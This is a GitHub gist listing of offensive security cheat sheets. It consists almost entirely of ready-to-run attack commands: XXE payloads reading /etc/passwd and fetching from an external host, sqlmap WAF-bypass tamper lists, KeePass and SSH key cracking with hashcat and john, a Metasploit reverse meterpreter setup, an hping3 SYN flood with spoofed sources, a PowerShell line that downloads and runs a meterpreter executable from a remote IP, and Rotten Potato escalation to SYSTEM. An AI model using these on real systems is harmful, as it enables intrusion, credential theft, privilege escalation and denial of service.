Skip to content

Instantly share code, notes, and snippets.

View castexyz's full-sized avatar

castexyz

2 followers · 0 following
View GitHub Profile
@castexyz
castexyz / basic xxe & xee payloads
Last active March 20, 2022 19:16
XXE and XEE basic
--------------------------------
Basic XXE
--------------------------------
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
--------------------------------
Basic XEE
--------------------------------
<!DOCTYPE data [
@castexyz
castexyz / sqlmapTamperScripts.md
Last active January 30, 2024 04:57
Sqlmap TamperScripts

SQLMAP Tamper Scripts

credits: https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

@castexyz
castexyz / Crunch
Last active January 19, 2018 14:54
Crunch
crunch 8 8 -t @@@@1980 -o /root/Desktop/wordlist.txt
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols
@castexyz
castexyz / hashcatKeepass
Last active January 19, 2018 14:48
Hashcat Keepass
./keepass2john CrackThis.kdb > CrackThis.hash
The hashcat binary does not expect the name of our KeePass database to be pre-pended to our hash
so we will have to trim the string with a text editor;
hashcat --help | grep -i "KeePass"
-m 13400 => KeePass Hash Provided
-a 0 => Dictionary Attack
-w 1 => Low Latency Desktop Profile
@castexyz
castexyz / Crack ssh priv key
Created February 24, 2018 13:13
Crack ssh priv key
ssh2john priv.key > privjohn
john privjohn --wordlist='/usr/share/wordlists/rockyou.txt'
@castexyz
castexyz / Upgrade to meterpreter
Last active March 11, 2018 11:56
Upgrade to meterpreter
WEBSHELL TO METERPRETER
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
SSH TO METERPRETER
use auxiliary/scanner/ssh/ssh_login_pubkey
@castexyz
castexyz / Hping3 flood
Last active March 6, 2018 12:12
Hping3 flood
hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source <target>
@castexyz
castexyz / Powershell download and execute
Created March 18, 2018 10:07
Powershell download and execute
cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/windows-meterpreter-staged-reverse-tcp-9877.exe','mess.exe');Start-Process 'mess.exe'
@castexyz
castexyz / Rotten potato
Created March 18, 2018 15:32
Rotten potato
load incognito
execute -f rottenpotato.exe -Hc
impersonate_token "NT Authority\\SYSTEM"
@castexyz
castexyz / XXE_payloads
Created August 2, 2018 09:32 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>